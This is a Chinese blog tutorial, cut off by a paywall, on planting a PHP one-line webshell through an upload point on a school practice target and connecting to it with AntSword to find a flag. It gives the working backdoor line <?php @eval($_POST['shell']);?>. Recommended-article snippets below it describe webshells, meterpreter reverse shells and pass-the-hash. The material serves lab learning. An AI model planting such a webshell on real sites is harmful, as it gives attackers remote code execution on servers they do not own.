植入木马获取网站权限

最新推荐文章于 2024-11-14 19:16:34 发布
原创 最新推荐文章于 2024-11-14 19:16:34 发布 · 1.2k 阅读 · 10 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#后端

本文介绍了如何通过植入一句话木马来获取网站权限。首先,通过学校的靶机实践,寻找后台管理员权限并登录。接着,确定可注入点,创建包含木马代码的webshell.php文件,并使用POST方式或工具(如蚁剑)上传到目标位置。成功上传后,通过访问文件验证木马植入,最后使用蚁剑连接并找到flag,完成权限获取。

获取网站权限

首先获得需操作网址(下面演示的是学校练习靶机)

在这里插入图片描述
打开网址,利用上篇所讲知识得到后台管理员权限,登入后台管理
在这里插入图片描述
随机寻找可注入点,找到注入点根目录位置
在这里插入图片描述
如图,这个就是随机找到的可植入木马位置

先写好一个木马文件,即一句话木马

<?php @eval($_POST['shell']);?>

将以上代码写入webshell.php文件中然后放在站点目录下通过浏览器访问,以POST方式传入shell=phpinfo();,或者用蚁剑或菜刀等工具连接(我这里用的是蚁剑):

在这里插入图片描述
然后上传至可植入位置,如下图

提交成功则显示下图,并从首页找到文件发布位

最低0.47元/天 解锁文章
曦枳icon.
关注
内网渗透、哈希传递、获取域控权限
weixin_51559599的博客
12-15 832
使用蚁剑打开命令终端运行该程序, DMZ 主机上线。网卡2(仅主机)172.16.1.128。网卡1(桥接)10.9.47.110。域控(win 2008)(仅主机)此时 DMZ 主机还是普通用户权限。使用 dvwa 文件上传模拟漏洞。调到 low 模式上传句话木马。使用蚁剑将木马上传到 DMZ 上。指定成功传递后与哪个主机做连接。抓取本地 ntlm hash。选择刚刚创建的 smb 监听。win11(nat 模式)访问 DMZ(win7)提权到 system。查看扫描出的内网主机。
利用文件上传木马病毒获取权限
2301_78859499的博客
04-25 650
在这提醒句,[1.jpg/b]中的1是名字,以及selna、picLubr也是,仅仅这几个是跟回你东西的名字,其他不要改。以及1是张图片,你自己的,selna还是我们的病毒,再接着后面的picLubr就是合成图片的名字。接着打开,我们在里面输入如下图中的代码(其实这个是个病毒木马,在主机上创建的话需要关闭防火墙)当我们打开了文件扩展名,我们就回去把文本文档的后缀名删掉,改成如图。保存关闭,接着打开文件夹,点击查看,勾选如下图。打开浏览器,设置,最下面网络设置,写入如下图。
利用句话木马获取网站web权限
weixin_50644728的博客
09-14 3447
1.登录网站后台,寻找文件上传地方 进入网站管理后台并登录管理员帐户和密码,寻找文件上传点。此网站有多个可上传文件的地方,在这我们选择附件管理页面中的上传附件。 2.写文件
怎么利用asp木马取得管理权限
u012971242的专栏
11-27 1425
前段时间泛滥成灾的动网论坛上传漏洞以及最近接二连三的各种asp系统暴露的上传漏洞,可能很多朋友手中有了很多webshell的肉鸡,至于选择怎么样这些小鸡的方式也是因人而异,有人继续提升权限,进步入侵,也有人只是看看,马儿放上去了过了就忘记了,也有些朋友,当webshell的新鲜劲儿过去了后台的神秘感和诱惑力也就大大增加。 其实,对很多功能强大的系统而言,拿到后台也就是拿到了个好的后门了
获取网页授权
Crimson1的博客
04-27 1225
在微信登录中,如何和获取网页授权。、登录微信测试公众品平台,修改网页授权基本信息,输入授权回调页面域名(自己的域名)。然后重新建立个tp框架 编写方法如图:&lt;?php namespace Home\Controller; use Think\Controller; class IndexController extends Controller { public function...
Web木马提权渗透
风起的博客
01-07 1906
个悲伤的故事 首先目标环境已经上传成功交互式木马,上传利用步骤在此不多做详解,本篇文章从木马上传后利用过程进行详解,本篇上传的木马为msfvenom生成获取meterpreter权限木马使用pyload为(php/meterpreter_reverse_tcp),木马文件名为shell.php。 首先我们在渗透机打开metasploit控制台,设置监听模块配置参数并利用目标访问网站 这里我们...
关于服务器被入侵+植入病毒木马
不会飞的鱼、
11-02 1838
近期项目中遇到了几个棘手的问题,海外服务器被植入木马WK程序。之前直听说xxx的服务器被入侵被黑,这次实打实遇到,还是没有做好安全防护策略,看了下应该是通过redis无密码漏洞渗透进来,9月14日早晨,客服侧反馈xxx系统从早晨6点半开始无法收到告警和工单,排查xxx相关网元服务都正常运维,内存,磁盘使用率占用正常,其中cpu使用率较高,存在异常情况。随机展开排查。
深信服安全团队详解网络钓鱼植入木马病毒的全过程
Sangfor_Access的博客
01-13 6685
背景概述 近日,深信服终端安全研究团队中捕获到了木马程序,攻击者通过网络钓鱼的手段诱导受害者点击运行邮件中附带的木马程序,结合正常的Adobe CEF Helper程序进行攻击;在局域网内通过共享目录进行传播,并在用户主机上留下后门程序进行窃密或者其他恶意行为。 详细分析 从受害主机上的情况来看,病毒主要有三个部分构成: 木马的启动程序Explorer.exe其实为正常的Adobe CEF Helper程序,是Adobe Creative Cloud程序的组件之: 该组织
shell反弹需要植入木马嘛?
08-15
shell反弹通常不需要直接植入木马。它是种黑客攻击技术,在这种技术中,黑客首先通过各种手段(如社会工程学、恶意软件或钓鱼链接)获取对目标计算机的临时访问权限,然后在目标系统上安装个所谓的"反弹壳"。这...
Web安全:句话木马
cldimd的博客
09-11 5868
概述 在很多的渗透过程中,渗透人员会上传句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么句话木马到底是什么呢? 先来看看最简单的句话木马: <?php @eval($_POST['attack']) ?> 【基本原理】利用文件上传漏洞,往目标网站中上传句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括
获取管理员权限
02-17
windows7获取管理员权限
Web安全-句话木马
jennycisp的博客
12-25 7940
在很多的渗透过程中,渗透人员会上传句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么句话木马到底是什么呢?【点击免费领取】优快云大礼包:《黑客&网络安全入门&进阶学习资源包》?基本原理】利用文件上传漏洞,往目标网站中上传句话木马,然后你就可以在本地通过中国菜刀即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括号内的语句字符串什么的全都当做代码执行。表示从页面中获得attack这个参数值。
【附教学】 SQL注入获取网站权限
jijisaq的博客
03-10 1317
本文旨在讲述Oracle数据库多种情况下如何进行注入获取网站权限
如何给网站注入木马程序
m0_75056154的博客
03-03 1535
如何给网站注入次性木马
图片asp木马的制作方法[转]
weixin_33929309的博客
03-20 313
网站里面除了asp文件,再就数图片文件最多了,它让我们的网页"美丽动人"嘻嘻,但是你有没有想到过这里面暗藏的杀机,图片也可以是asp木马网站里面除了asp文件,再就数图片文件最多了,它让我们的网页"美丽动人"嘻嘻,但是你有没有想到过这里面暗藏的杀机,图片也可以是asp木马。 asp木马已经出现很长时间了,种类也越来越多,但是说到隐蔽性,我们红魂老大写的--冰狐浪子a...
mysql文件上传漏洞_利用文件上传漏洞渗透某传销服务器
weixin_36109375的博客
02-28 341
利用文件上传漏洞渗透某传销服务器Simeon本文已投i春秋https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=30085&page=1#pid389491对于传销网站的服务器来说,目前都防护较强,使用安全狗等软硬件防范,但由于最终使用该产品的必须由人来实现,当获取webshell的情况下,通过些技术手段可以绕过防火墙的防护,...
权限提升 - 网站权限后台漏洞第三方获取
最新发布
m0_57836225的博客
11-14 796
这部分内容主要围绕获取网站权限展开,涉及到通过后台、漏洞利用以及第三方相关因素来实现权限提升。是在网络安全测试和防护中需要重点关注的部分,了解这些方法有助于发现和修复潜在的安全隐患,避免恶意攻击者获取不当权限权限提升中网站权限后台漏洞第三方获取个复杂但有规律的过程。通过合理的信息收集、对后台功能和漏洞的分析以及关注第三方因素,可以更好地评估和提升网站的安全性。在实际操作中,定要在合法合规的前提下进行安全测试和防护工作,避免对他人的网站造成非法入侵和损害。
获取网站后台权限理解
妖魔鬼怪快离开的博客
03-31 7217
后台常见位置查找 猜解常用路径 Admin、admin_login.asp、admin_login.php部分网站默认都是admin目录后台。虽然开发人员安全意识逐渐完善,但还是有相当部分网站管理员直接就用默认的路径。我们找后台时从常见的默认界面入手往往会有意外收获。 robots.txt robots.txt是种存放于网站根目录下的ASCII编码的文本文件,它通常告诉网络搜索引擎,此网站中的哪些内容是不能被搜索引擎获取的,哪些是可以被获取的。管理员们为了让搜索引擎不要收录admin页面而在robots
提权-网站权限后台漏洞第三方获取
weixin_46425310的博客
08-02 536
提权-网站权限后台漏洞第三方获取 webshell获取 * 后台:文件上传,模板修改,数据备份,数据修改等功能,若有文件上传功能就可以拿shell * 漏洞:文件上传,文件包含,RCE执行,SQL注入,若是已知cms,看有无已知漏洞拿shell * 第三方:编辑器,中间件平台,phpmyadmin… 提升权限:重点明白当前获取权限能做哪些事情。 后台权限,数据库权限,接口权限,系统权限,域控权限后台权限(爆破,sql注入爆库,弱口令):网站或应用后台只能操作应用的界面内容,数据,图片等信息,无法操
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值